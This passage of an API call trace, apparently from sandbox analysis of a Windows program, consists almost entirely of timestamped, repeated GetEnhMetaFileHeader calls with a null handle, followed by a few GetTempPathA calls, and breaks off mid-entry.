hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: 